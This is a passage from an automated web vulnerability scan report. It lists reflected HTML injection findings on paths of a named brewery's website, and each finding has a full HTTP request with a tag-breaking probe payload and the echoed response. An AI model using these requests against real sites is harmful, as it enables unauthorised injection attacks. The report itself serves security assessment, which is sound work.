<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="help41ae0"><a>a81cb64163d_page" class="help41ae0">
...[SNIP]...

1.180. http://www.ninkasibrewing.com/help/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/help/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6937c"><a>7458fba0b6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help6937c"><a>7458fba0b6b/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="help6937c"><a>7458fba0b6b_page" class="help6937c">
...[SNIP]...

1.181. http://www.ninkasibrewing.com/help/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/help/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55e46"><a>dc8a43dd223 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help55e46"><a>dc8a43dd223/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="help55e46"><a>dc8a43dd223_page" class="help55e46">
...[SNIP]...

1.182. http://www.ninkasibrewing.com/help/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/help/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99693"><a>74a561e9af4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help99693"><a>74a561e9af4/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="help99693"><a>74a561e9af4_page" class="help99693">
...[SNIP]...

1.183. http://www.ninkasibrewing.com/home/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/home/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 215e5"><a>88974b7d081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home215e5"><a>88974b7d081/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="home215e5"><a>88974b7d081_page" class="home215e5">
...[SNIP]...

1.184. http://www.ninkasibrewing.com/home/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/home/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c676"><a>e02e90da893 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home1c676"><a>e02e90da893/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="home1c676"><a>e02e90da893_page" class="home1c676">
...[SNIP]...

1.185. http://www.ninkasibrewing.com/home/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/home/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5e0"><a>d278f502dff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home9a5e0"><a>d278f502dff/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="home9a5e0"><a>d278f502dff_page" class="home9a5e0">
...[SNIP]...

1.186. http://www.ninkasibrewing.com/home/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/home/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210e2"><a>b548d58de6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home210e2"><a>b548d58de6c/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="home210e2"><a>b548d58de6c_page" class="home210e2">
...[SNIP]...

1.187. http://www.ninkasibrewing.com/home/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/home/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dede"><a>1e7eb0352e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home8dede"><a>1e7eb0352e9/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="home8dede"><a>1e7eb0352e9_page" class="home8dede">
...[SNIP]...

1.188. http://www.ninkasibrewing.com/home/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/home/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbec0"><a>8202d7a7465 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homefbec0"><a>8202d7a7465/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="homefbec0"><a>8202d7a7465_page" class="homefbec0">
...[SNIP]...

1.189. http://www.ninkasibrewing.com/home/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/home/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 663bc"><a>df79f9bb41c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home663bc"><a>df79f9bb41c/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="home663bc"><a>df79f9bb41c_page" class="home663bc">
...[SNIP]...

1.190. http://www.ninkasibrewing.com/media/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/media/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0abf"><a>00dc92c2364 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mediaf0abf"><a>00dc92c2364/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="mediaf0abf"><a>00dc92c2364_page" class="mediaf0abf">
...[SNIP]...

1.191. http://www.ninkasibrewing.com/media/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/media/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b99e"><a>d353410d2d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /media5b99e"><a>d353410d2d6/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="media5b99e"><a>d353410d2d6_page" class="media5b99e">
...[SNIP]...

1.192. http://www.ninkasibrewing.com/media/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/media/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94a33"><a>5b783fa7801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /media94a33"><a>5b783fa7801/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="media94a33"><a>5b783fa7801_page" class="media94a33">
...[SNIP]...

1.193. http://www.ninkasibrewing.com/media/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/media/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73fdc"><a>3284c577b00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /media73fdc"><a>3284c577b00/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="media73fdc"><a>3284c577b00_page" class="media73fdc">
...[SNIP]...

1.194. http://www.ninkasibrewing.com/media/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/media/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1309"><a>af44161986e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mediaf1309"><a>af44161986e/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="mediaf1309"><a>af44161986e_page" class="mediaf1309">
...[SNIP]...

1.195. http://www.ninkasibrewing.com/media/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/media/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba126"><a>4d385f007ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mediaba126"><a>4d385f007ef/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="mediaba126"><a>4d385f007ef_page" class="mediaba126">
...[SNIP]...

1.196. http://www.ninkasibrewing.com/media/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/media/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95c3f"><a>1b1450f199e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /media95c3f"><a>1b1450f199e/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="media95c3f"><a>1b1450f199e_page" class="media95c3f">
...[SNIP]...

1.197. http://www.ninkasibrewing.com/merchandise/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/merchandise/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc0d2"><a>96b73e45a3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandisecc0d2"><a>96b73e45a3f/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="merchandisecc0d2"><a>96b73e45a3f_page" class="merchandisecc0d2">
...[SNIP]...

1.198. http://www.ninkasibrewing.com/merchandise/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/merchandise/content/css/basic.css

Issue detail

